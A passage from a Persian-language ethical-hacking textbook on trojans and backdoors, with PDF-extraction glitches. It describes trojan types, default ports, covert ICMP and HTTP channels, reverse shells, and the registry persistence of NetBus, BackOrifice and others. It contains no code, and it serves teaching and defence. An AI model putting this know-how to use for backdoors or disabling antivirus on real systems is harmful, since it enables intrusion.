ﻗﺮﺑﺎﻧﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

ﺗﺮوﺟﺎن ﭼﻴﺴﺖ؟

ﺗﺮوﺟﺎن، ﺑﺮﻧﺎﻣﻪ ﻣﺨﺮﺑﻲ اﺳﺖ ﻛﻪ ﺧﻮد را ﺑﻪ ﻋﻨﻮان ﺑﺮﻧﺎﻣﻪ ﺧﻮب ﻧﺸﺎن ﻣﻲ دﻫﺪ . ﻣﻌﻤﻮﻻ ﺗﺮوﺟﺎن ﻫﺎ ﻫﻤﺮاه ﺑﺎ ﺑﺮﻧﺎﻣﻪ دﻳﮕﺮ ﻳﺎ ﺑﺴﺘﻪ ﻧﺮم اﻓﺰاري داﻧﻠﻮد ﻣﻲ ﺷﻮﻧﺪ و زﻣﺎﻧﻴﻜﻪ ﺑﺮ روي ﺳﻴﺴﺘﻤﻲ ﻧﺼﺐ ﺷﺪ ﻧﺪ ، ﻣﻲ ﺗﻮاﻧﻨ ﺪ ﺳﺒﺐ ﺳﺮﻗﺖ ﻳﺎ از دﺳﺖ دادن اﻃﻼﻋﺎت، ﻛﻨﺪي ﻳﺎ اﺧﺘﻼل ﺳﻴﺴﺘﻢ ﺷﻮ ﺪﻧ . ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﻋ ﻨﻮان آﻏﺎز ﺣﻤﻼت دﻳﮕﺮي ﻫﻤﭽﻮن DDOS ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﺪﻧﮔﻴﺮ . ﺑﺴﻴﺎري از ﺗﺮوﺟﺎن ﻫﺎ ﺑﺮاي دﺳﺘﻜﺎري داده ﻫﺎ در ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ ، ﻣﺪﻳﺮﻳﺖ ﭘﺮدازش ﻫﺎ، اﺟﺮاي از راه دور دﺳﺘﻮرات، ﺗﻤﺎﺷﺎي ﺗﺼﺎوﻳﺮ ﺻﻔﺤﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻛﺎرﺑﺮ ، و رﻳﺴﺘﺎرت ﻳﺎ ﺧﺎﻣﻮش ﻛﺮدن ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ . .

ﺗﺮوﺟﺎن ﻫﺎ در ﭘﺸﺖ ﺑﺮﻧﺎﻣﻪ ﻫﺎي دﻳﮕﺮ ﻧﺼﺐ ﻣﻲ ﺷﻮﻧﺪ و ﻣﻌﻤﻮﻻ ﺑﺪون اﻃﻼع ﻛﺎرﺑﺮ، ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻣﻲ ﺪﻧﺷﻮ . ﺗﺮوﺟﺎن ﺑﻪ روش ﻫﺎي ﻣﺨﺘﻠﻔﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ ارﺳﺎل ﻣﻲ ﺷﻮد : ﺑﻪ ﻋﻨﻮان ﻳﻚ ﭘﻴﻮﺳﺖ ﺑﺮاي ﭘﻴﺎم، IRC ، ﻳﺎ اﺷﺘﺮاك ﻓﺎﻳﻞ . ﺑﺴﻴﺎري از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺟﻌﻠﻲ، ﺧﻮد را ﺑﻪ ﻋﻨﻮان ﻧﺮم اﻓﺰارﻫﺎي ﻗﺎﻧﻮﻧﻲ، اﺑﺰارﻫﺎي ﺣﺬف spyware ، ﺑﺮﻧﺎﻣﻪ ﻫﺎي

89

ﺑﻬﻴﻨﻪ ﺳﺎزي ﺳﻴﺴﺘﻢ، ﻣﺤﺎﻓﻆ ﺻﻔﺤﻪ ﻧﻤﺎﻳﺶ، ﻣﻮﺳﻴﻘﻲ، ﺗﺼﺎوﻳﺮ، ﺑﺎزي ﻫﺎ، و وﻳﺪﺋﻮ واﻧﻤﻮد ﻣﻲ ﻛﻨﻨﺪ . ﺗﺒﻠﻴﻐﺎت ﺑﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎي راﻳﮕﺎن، ﻓﺎﻳﻞ ﻫﺎي ﻣﻮﺳﻴﻘﻲ، ﻳﺎ ﻓﺎﻳﻞ ﻫﺎي وﻳﺪﺋﻮﻳﻲ، ﻗﺮﺑﺎﻧﻲ را ﺑﺮاي ﻧﺼﺐ ﺑﺮﻧﺎﻣﻪ ﺗﺮوﺟﺎن ﺗﺮﻏﻴﺐ ﻣﻲ ﺪﻨﻛﻨ . اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻫﺎ، دﺳﺘﺮﺳﻲ ﺳﻴﺴﺘﻤﻲ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺪف دارﻧﺪ و ﻣﻲ ﺗﻮاﻧﻨﺪ ﻣﺨﺮب ﺑﺎﺷﻨﺪ . ﺟﺪول زﻳﺮ، ﺑﺮﺧﻲ از ﺗﺮوﺟﺎن ﻫﺎي راﻳﺞ ﺑﻪ ﻫﻤﺮاه ﺷﻤﺎره ﭘﻮرت آﻧﻬﺎ را ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

Trojan Protocol Port BackOrifice UDP 31337 or 31338 Deep Throat UDP 2140 or 3150 NetBus TCP 12345 and 12346 Whack-a-mole TCP 12361 and 12362 NetBus 2 TCP 20034 GirlFreind TCP 21544 Masters Paradise TCP 3129, 40421, 40422, 40423, and 40426

ﻛﺎﻧﺎل ﻫﺎي overt و covert ﭼﻴﺴﺖ؟

ﻛﺎﻧﺎل overt ، روش ﻃﺒﻴﻌﻲ و ﻗﺎﻧﻮﻧﻲ ارﺗﺒﺎط ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮي اﺳﺖ . ﻛﺎﻧﺎل covert ، از ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻳﺎ ﻣﺴﻴﺮﻫﺎي ارﺗﺒﺎﻃﻲ ﻛﻪ ﻣﻮرد ﻗﺼﺪ ﻧﻴﺴﺘﻨﺪ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . .

ﺗﺮوﺟﺎن ﻫﺎ از ﻛﺎﻧﺎل ﻫﺎي covert ﺑﺮاي ارﺗﺒﺎط اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﺑﻌﻀﻲ از ﺗﺮوﺟﺎن ﻫﺎي ﻛﻼﻳﻨﺖ از ﻛﺎﻧﺎل ﻫﺎي covert ﺑﺮاي ارﺳﺎل دﺳﺘﻮراﻟﻌﻤﻞ ﻫﺎ ﺑﻪ ﻋﻨﺼﺮ ﺳﺮور در ﺳﻴﺴﺘﻢ ﺑﻪ ﺧﻄﺮ اﻓﺘﺎده اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ اﻳﻦ ﺮﻣا ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ ارﺗﺒﺎﻃﺎت ﺗﺮوﺟﺎن ﺑﻪ ﺳﺨﺘﻲ رﻣﺰﮔﺸﺎﻳﻲ و درك ﺷﻮ .ﺪﻧ .ﺪﻧ

ﻛﺎﻧﺎل ﻫﺎي Covert ، ﺑﺮ روي ﺗﻜﻨﻴﻜﻲ ﻛﻪ ﺗﺎﻧﻠﻴﻨﮓ ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد اﺗﻜﺎ ﻣﻲ ﻛﻨﺪ ﻛﻪ اﺟﺎزه ﻣﻲ دﻫﺪ ﭘﺮوﺗﻜﻠﻲ از ﻃﺮﻳﻖ ﭘﺮوﺗﻜﻞ دﻳﮕﺮ ﺣﻤﻞ ﺷﻮد . ﻣﺜﻼ اﺳﺘﻔﺎده از ﭘﻮرت 80 ﺑﺮاي telnet . .

90

اﺑﺰارﻫﺎي ﻫﻚ Loki ، ﻳﻜﻲ از اﺑﺰارﻫﺎي ﻫﻚ اﺳﺖ ﻛﻪ دﺳﺘﺮﺳﻲ shell را از ﻃﺮﻳﻖ ICMP ﻣﻲ دﻫﺪ و ﺷﻨﺎﺳﺎﻳﻲ آن را ﻧﺴﺒﺖ ﺑﻪ backdoor ﻫﺎ، ﺑﺴﻴﺎر دﺷﻮار ﻣﻲ ﺳﺎزد . ﻣﺠﻤﻮﻋﻪ اي از ﺑﺴﺘﻪ ﻫﺎي ICMP از ﻃﺮﻳﻖ ﺷﺒﻜﻪ ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ . ﻫﻜﺮ، دﺳﺘﻮرات را از ﻃﺮﻳﻖ ﻛﻼﻳﻨﺖ Loki ارﺳﺎل ﻣﻲ ﻛﻨﺪ و آﻧﻬﺎ را روي ﺳﺮور اﺟﺮا ﻣﻲ ﻛﻨﺪ . .

91

اﻧﻮاع ﺗﺮوﺟﺎن ﻫﺎ ﻫﺎ

ﺗﺮوﺟﺎن ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺣﻤﻼت زﻳﺎدي را اﻧﺠﺎم دﻫﻨﺪ . ﺑﺮﺧﻲ از ﻣﻬﻢ ﺗﺮﻳﻦ اﻧﻮاع ﺗﺮوﺟﺎن ﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : :

• RAT ) Remote Access Trojans ): ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ از راه دور ﺑﻪ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻣﻲﺷ .دﻮ • Data-Sending Trojans : ﺑﺮاي ﻳﺎﻓﺘﻦ داده ﻫﺎ در ﺳﻴﺴﺘﻢ و ﺗﺤﻮﻳﻞ آن ﺑﻪ ﻫﻜ ﺮ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد. • Destructive Trojans : ﺑﺮاي ﺣﺬف ﻳﺎ ﺧﺮاب ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد. • Denial of Service Trojans : ﺑﺮاي اﻧﺠﺎم ﺣﻤﻼت DoS اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد. • Proxy Trojans : ﺑﺮاي ﺗﺎﻧﻞ ﻛﺮدن ﺗﺮاﻓﻴﻚ ﻳﺎ اﺟﺮاي ﺣﻤﻼت ﻫﻜﺮ از ﻃﺮﻳﻖ ﺳﻴﺴﺘﻢ دﻳﮕﺮ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد. • FTP Trojans : ﺑﺮاي اﻳﺠﺎد ﻳﻚ ﺳﺮور FTP ﺑﺮاي ﻛﭙﻲ ﻓﺎﻳﻞ ﻫﺎي روي ﻳﻚ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد. • Security software disabler Trojans : ﺑﺮاي ﻣﺘﻮﻗﻒ ﻛﺮدن ﻧﺮم اﻓﺰار آﻧﺘﻲ وﻳﺮوس اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد.

ﺗﺮوﺟﺎن ﻫﺎي Reverse-connecting ﭼﮕﻮﻧﻪ ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ؟

ﺗﺮوﺟﺎن ﻫﺎي reverse-connecting ، اﺟﺎزه دﺳﺘﺮﺳﻲ ﻫﻜﺮ ﺑﻪ ﻳﻚ ﻣﺎﺷﻴﻦ ﻛﻪ در داﺧﻞ ﺷﺒﻜﻪ ﻗﺮار دارد را از ﺧﺎرج ﺷﺒﻜﻪ ﻓﺮاﻫﻢ ﻣﻲ ﻛﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺗﺮوﺟﺎن ﺳﺎده را روي ﺳﻴﺴﺘﻤﻲ در ﺷﺒﻜﻪ داﺧﻠﻲ ﻧﺼﺐ ﻛﻨﺪ ﻣﺜﻞ ﺳﺮور reverse WWW shell . در ﺣﺎﻟﺖ ﻋﺎدي ( ﻣﻌﻤﻮﻻ ﻫﺮ 60 ﺛﺎﻧﻴﻪ) ، ﺳﺮور داﺧﻠﻲ ﺗﻼش ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﻪ ﺳﻴﺴﺘﻢ اﺻﻠﻲ ﺧﺎرﺟﻲ دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ ﺗﺎ دﺳﺘﻮرات را ﺑﮕﻴﺮد . اﮔﺮ ﻫﻜﺮ ، ﭼﻴﺰي را در ﺳﻴﺴﺘﻢ اﺻﻠﻲ ﺗﺎﻳﭗ ﻛﺮد، اﻳﻦ دﺳﺘﻮرات روي

92

ﺳﻴﺴﺘﻢ داﺧﻠﻲ ﺑﺎزﻳﺎﺑﻲ و اﺟﺮا ﻣﻲ ﺷﻮﻧﺪ . Reverse WWW shell ، از HTTP اﺳﺘﺎﻧﺪارد اﺳﺘﻔﺎد ه ﻣﻲ ﻛﻨﺪ . از آﻧﺠﺎﺋﻴﻜﻪ ﺷﻨﺎﺳﺎﻳﻲ آن دﺷﻮار اﺳﺖ، ﺧﻄﺮﻧﺎك اﺳﺖ . ﻣﺸﺎﺑﻪ اﻳﻦ اﺳﺖ ﻛﻪ ﻛﻼﻳﻨﺖ، از ﺷﺒﻜﻪ داﺧﻠﻲ، وب را ﻣﺸﺎﻫﺪه ﻣﻲ ﻛﻨﺪ . .

اﺑﺰارﻫﺎي ﻫﻚ TROJ_QAZ ، ﺗﺮوﺟﺎﻧﻲ اﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ notepad.exe را ﺑﻪ note.com ﺗﻐﻴﻴﺮ ﻧﺎم ﻣﻲ دﻫﺪ و ﺳﭙﺲ آن را ﺑﻪ ﻋﻨﻮان notpad.exe ﺑﻪ ﭘﻮﺷﻪ وﻳﻨﺪوز ﻛﭙﻲ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﺮﻣا ﻣﻮﺟﺐ ﻣﻲ ﺷﻮد ﻛﻪ ﻫﺮ وﻗﺖ ﻛﻪ ﻛﺎرﺑﺮ ﺑﺮﻧﺎﻣﻪ Notepad را اﺟﺮا ﻣﻲ ﻛﻨﺪ، اﻳﻦ ﺗﺮوﺟﺎن اﺟﺮا ﺷﻮد . ﻫﻤﭽﻨﻴﻦ داراي backdoor اﺳﺖ ﻛﻪ ﺑﺮاي اﺗﺼﺎل و ﻛﻨﺘﺮل ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺎ اﺳﺘﻔﺎده از ﭘﻮرت 7597 اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﻫﻤﭽﻨﻴﻦ، TROJ_QAZ ، ﺑﺮ روي رﺟﻴﺴﺘﺮي اﺛﺮ ﻣﻲ ﮔﺬار د ﺗﺎ ﻫﺮ وﻗﺖ ﻛﻪ وﻳﻨﺪوز ﺷﺮوع ﺷﺪ، اﻳﻦ ﺗﺮوﺟﺎن ﻫﻢ ﺑﺎرﮔﺬاري ﺷﻮد . .

Tini ، ﻳﻚ ﺗﺮوﺟﺎن و backdoor ﺑﺴﻴﺎر ﺳﺎده و ﻛﻮﭼﻚ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز اﺳﺖ . ﺑﺮ روي ﭘﻮرت 7777 ﮔﻮش ﻣﻲ دﻫﺪ و اﺟﺎزه دﺳﺘﺮﺳﻲ راه دور ﻫﻜﺮ ﺑﻪ Cmd ﺳﻴﺴﺘﻢ ﻫﺪف را ﻣﻲ دﻫﺪ . ﺑﺮاي اﺗﺼﺎل ﺑﻪ Tini Server ، ﻫﻜﺮ ﺑﺎﻳﺪ ﺑﻪ ﭘﻮرت telnet ، 7777 ﻛﻨﺪ . . iCmd ، ﻣﺸﺎﺑﻪ tini اﺳﺖ ﺑﺎ اﻳﻦ ﺗﻔﺎوت ﻛﻪ اﺟﺎزه ﭼﻨﺪﻳﻦ ارﺗﺒﺎط را ﻣﻲ دﻫﺪ و ﻧﻴﺰ ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﭘﺴﻮرد ﺳﺖ ﻛﻨﻴﺪ . .

Proxy Server Trojan ، زﻣﺎﻧﻴﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮي را آﻟﻮده ﻣﻲ ﻛﻨﺪ، از آن ﺑﻪ ﻋﻨﻮان ﭘﺮوﻛﺴﻲ ﺳﺮور اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﻫﺰاران ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑ ﺮ روي اﻳﻨﺘﺮﻧﺖ ﺑﺎ اﺳﺘﻔﺎده از اﻳﻦ ﺗﻜﻨﻴﻚ، آﻟﻮده ﺷﺪه .اﻧﺪ .اﻧﺪ

Donald Dick ، ﻳﻚ ﺗﺮوﺟﺎن و backdoor ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز اﺳﺖ ﻛﻪ اﺟﺎزه دﺳﺘﺮﺳﻲ ﻛﺎﻣﻞ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ را از ﻃﺮﻳﻖ اﻳﻨﺘﺮﻧﺖ ﺑﺮاي ﻫﻜﺮ ﻓﺮاﻫﻢ ﻣﻲ ﺳﺎزد . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮﻧﺎﻣﻪ را روي ﺳﻴﺴﺘﻢ، ﺑﺨﻮاﻧﺪ، ﺑﻨﻮﻳﺴﺪ، ﻳﺎ اﺟﺮا ﻛﻨﺪ . اﻳﻦ ﺗﺮوﺟﺎن، ﺷﺎﻣﻞ keylogger و registery parser اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﻋﻤﻠﻴﺎﺗﻲ ﻫﻤﭽﻮن ﺑﺎز ﻳﺎ ﺑﺴﺘﻪ ﻛﺮدن CD-ROM را اﻧﺠﺎم دﻫﺪ . ﺣﻤﻠﻪ ﻛﻨﻨﺪه، از ﻛﻼﻳﻨﺖ ﺑﺮاي ارﺳﺎل دﺳﺘﻮرات ﺑﻪ ﭘﻮرت ﻫﺎي از ﭘﻴﺶ ﺗﻌﻴﻴﻦ ﺷﺪه ﻗﺮﺑﺎﻧﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﭘﻮرت ﻫﺎي ﭘﻴﺶ ﻓﺮض اﻳﻦ ﺗﺮوﺟﺎن 23476 ﻳﺎ 23477 ﻫﺴﺘﻨﺪ . .

SubServen ، ﺗﺮوﺟﺎﻧﻲ اﺳﺖ ﻛﻪ زﻣﺎﻧﻴﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ آﻟﻮده ﺷﺪه ﺑﻪ اﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻣﻲ ﺷﻮد، ﺑﻪ ﻫﻜﺮ اﻃﻼع ﻣﻲ دﻫﺪ و اﻃﻼﻋﺎﺗﻲ در ﻣﻮرد ﺳﻴﺴﺘﻢ را ﺑﻪ ﻫﻜﺮ ﻣﻲ دﻫﺪ . اﻳﻦ اﻃﻼع رﺳﺎﻧﻲ ﻣﻲ ﺗﻮاﻧﺪ از ﻃﺮﻳﻖ ﺷﺒﻜﻪ IRC ، ﺗﻮﺳﻂ ICQ ، ﻳﺎ ﺗﻮﺳﻂ اﻳﻤﻴﻞ اﻧﺠﺎم ﺷﻮد . اﻳﻦ ﺗﺮوﺟﺎن ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ ﺳﻴﺴﺘﻢ ﻛﻨﺪ ﺷﻮد و ﺑﺮ روي ﺳﻴﺴﺘﻢ آﻟﻮده ﺷﺪه، ﭘﻴﻐﺎم ﻫﺎي ﺧﻄﺎ ﺗﻮﻟﻴﺪ ﻣﻲ ﻛﻨﺪ . .

93

NetBus ، ﺗﺮوﺟﺎﻧﻲ ﻣﺒﺘﻨﻲ ﺑﺮ وﻳﻨﺪوز اﺳﺖ ﻛﻪ ﻣﺸﺎﺑﻪ Donald Dick اﺳﺖ . ﻛﻠﻴﺪي ﺑﺎ ﻧﺎم NetBus Server در ﻣﺴﻴﺮ HKEY_CURRENT_USER اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ و ﻛﻠﻴﺪ HKEY_CURRENT_USER\NetBus Server\General\TCPPort را ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﺪ . اﮔﺮ NetBus ﺑﺮاي ﺷﺮوع ﺧﻮدﻛﺎر ﺗﻨﻈﻴﻢ ﺷﺪه ﺑﺎﺷﺪ، ورودي را در در ﻣﺴﻴﺮ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices رد رد رﺟﻴﺴﺘﺮي و ﺑﺎ ﻧﺎم NetBus Server اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ . .

BackOrifice 2000 ، اﺑﺰار ﻣﺪﻳﺮﻳﺘﻲ از راه دور اﺳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﻛﻨﺘﺮل ﻳﻚ ﺳﻴﺴﺘﻢ از ﻃﺮﻳﻖ ارﺗﺒﺎط TCP/IP ﺑﺎ اﺳﺘﻔﺎده از ﻳﻚ اﻳﻨﺘﺮﻓﻴﺲ ﮔﺮاﻓﻴﻜﻲ اﺳﺘﻔﺎده ﻛﻨﺪ . BackOrifice ، در ﻟﻴﺴﺖ ﭘﺮدازش ﻫﺎي در ﺣﺎل اﺟﺮا ﻧﺸﺎن داده ﻧﻤﻲ ﺷﻮد و ﺧﻮد را داﺧﻞ رﺟﻴﺴﺘﺮي ﻛﭙﻲ ﻣﻲ ﻛﻨﺪ ﺗﺎ زﻣﺎﻧﻴﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺷﺮوع ﺑﻪ ﻛﺎر ﻛﺮد، اﺟﺮا ﺷﻮد . اﻳﻦ ﺗﺮوﺟﺎن، ﻛﻠﻴﺪ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices را ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﺪ . Plug-in ﻫﺎي اﻳﻦ ﺑﺮ ﻧﺎﻣﻪ، ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ را ﺑﻪ ﺑﺮﻧﺎﻣﻪ BackOrifice اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺷﺎﻣﻞ رﻣﺰﮔﺬاري remote desktop ، 3DES ﺑﺎ ﻛﻨﺘﺮل ﻛﻴﺒﻮرد و ﻣﺎوس، وﻳﺮاﻳﺶ رﺟﻴﺴﺘﺮي ﺑﻪ ﺻﻮرت ﮔﺮاﻓﻴﻜﻲ و از راه دور، ارﺗﺒﺎﻃﺎت اﻣﻦ ﭘﺮوﺗﻜﻞ ﻫﺎي UDP و ICMP ، و ... .

ComputerSpy Key Logger ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺿﺒﻂ ﻓﻌﺎﻟﻴﺘﻬﺎي ﻛﺎﻣﭙﻴﻮﺗﺮ روي ﻳﻚ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻛﻨﺪ از ﻗﺒﻴﻞ : وب ﺳﺎﻳﺖ ﻫﺎي ﻣﺸﺎﻫﺪه ﺷﺪه، ﻻﮔﻴﻦ ﻫﺎ و ﭘﺴﻮردﻫﺎ ﺑﺮاي AIM ، AOL ، MSN ، ICQ و Yahoo Messanger ﻳﺎ webmail . ﻫﻤﭽﻨﻴﻦ اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﺗﻮاﻧﺪ در ﺑﺎزه ﻫﺎي زﻣﺎﻧﻲ ﻣﺸﺨﺺ ﺷﺪه، از ﺗﻤﺎم ﺻﻔﺤﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ، ﻋﻜﺲ ﺑﮕﻴﺮد . .

Beast ، ﺗﺮوﺟﺎﻧﻲ اﺳﺖ ﻛﻪ در ﺣﺎﻓﻈﻪ اي ﻛﻪ ﺑﺮاي ﺳﺮوﻳﺲ WinLogon.exe اﺧﺘﺼﺎص ﻳﺎﻓﺘﻪ اﺳﺖ اﺟﺮا ﻣﻲ ﺷﻮد . زﻣﺎﻧﻴﻜﻪ ﻧﺼﺐ ﺷﺪ، ﺑﺮﻧﺎﻣﻪ ﺧﻮد را داﺧﻞ Windows Explorer ﻳﺎ Internet Explorer وارد ﻣﻲ ﻛﻨﺪ . ﻳﻜﻲ از ﻗﺎﺑﻠﻴﺖ ﻫﺎي ﺷﺎﺧﺺ اﻳﻦ ﺑﺮﻧﺎﻣﻪ اﻳﻦ اﺳﺖ ﻛﻪ all-in-one اﺳﺖ ﻳﻌﻨﻲ اﻳﻨﻜﻪ ﻛﻼﻳﻨﺖ، ﺳﺮور، و وﻳﺮاﻳﺸﮕﺮ ﺳﺮور ﻫﻤﮕﻲ در ﻫﻤﺎن ﺑﺮﻧﺎﻣﻪ ذﺧﻴﺮه ﻣﻲ ﺷﻮﻧﺪ . .

CyberSpy ، ﻳﻚ Telnet Trojan اﺳﺖ ﻛﻪ ﺧﻮد را داﺧﻞ داﻳﺮﻛﺘﻮري وﻳﻨﺪوز ﻛﭙﻲ ﻣﻲ ﻛﻨﺪ و در رﺟﻴﺴﺘﺮي ﺛﺒﺖ ﻣﻲ ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﻫﺮ زﻣﺎن ﻛﻪ ﺳﻴﺴﺘﻢ آﻟﻮده، رﻳﺴﺘﺎرت ﻣﻲ ﺷﻮد، اﺟﺮا ﻣﻲ ﺷﻮد . زﻣﺎﻧﻴﻜﻪ اﻧﺠﺎم ﺷﺪ، اﻋﻼﻣﻲ را از ﻃﺮﻳﻖ اﻳﻤﻴﻞ ﻳﺎ ICQ ارﺳﺎل ﻣﻲ ﻛﻨﺪ و ﺳﭙﺲ ﺑﻪ ﭘﻮرت ﻫﺎي TCP/IP ﻛﻪ ﻗﺒﻼ ﻣﺸﺨﺺ ﺷﺪه اﻧﺪ، ﮔﻮش ﻣﻲ دﻫﺪ . .

SubRoot ، ﺗﺮوﺟﺎن ﻣﺪﻳﺮﻳﺘﻲ از راه دور اﺳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي اﺗﺼﺎل ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ روي ﭘﻮرت 1700 اﺳﺘﻔﺎده ﻛﻨﺪ . .

LetMeRule ، ﺗﺮوﺟﺎن راه دور اﺳﺖ ﻛﻪ ﺑﺮاي ﮔﻮش دادن ﺑﻪ ﻫﺮ ﭘﻮرﺗﻲ روي ﺳﻴﺴﺘﻢ ﻫﺪف ﭘﻴﻜﺮﺑﻨﺪي ﻣﻲ ﺷﻮد . ﻛﻪ از Cmd ﺑﺮاي ﻛﻨﺘﺮل ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﻣﻲ ﺗﻮاﻧﺪ ﻫﻤﻪ ﻓﺎﻳﻞ ﻫﺎﻳﻲ را در داﻳﺮﻛﺘﻮر ﻣﺸﺨﺺ ﭘﺎك ﻛﻨﺪ، ﻓﺎﻳﻞ ﻫﺎ را در ﻛﺎﻣﭙﻴﻮﺗﺮ راه دور اﺟﺮا ﻛﻨﺪ، ﻳﺎ رﺟﻴﺴﺘﺮي را ﻣﺸﺎﻫﺪه و ﺗﻐﻴﻴﺮ دﻫﺪ . .

94

Firekiller 2000 ، ﺑﺮﻧﺎﻣﻪ ﻫﺎي آﻧﺘﻲ وﻳﺮوس و ﻓﺎﻳﺮوال ﻫﺎ را ﻏﻴﺮ ﻓﻌﺎل ﻣﻲ ﻛﻨﺪ . ﺑﺮاي ﻧﻤﻮﻧﻪ، اﮔﺮ آﻧﺘﻲ وﻳﺮوس ﻧﻮرﺗﻦ ﺑﺮ روي اﺳﻜﻦ ﺧﻮدﻛﺎر ﺑﺎﺷﺪ و ﻓﺎﻳﺮوال ATGuard ﻓﻌﺎل ﺑﺎﺷﺪ، اﻳﻦ ﺗﺮوﺟﺎن، اﻳﻦ دو ﺑﺮﻧﺎﻣﻪ را ﻣﺘﻮﻗﻒ ﻣﻲ ﺳﺎزد و ﺑﺮاي اﺳﺘﻔﺎده ﻣﺠﺪد، ﺑﺎﻳﺪ دوﺑﺎره ﻧﺼﺐ ﺷﻮﻧﺪ . .

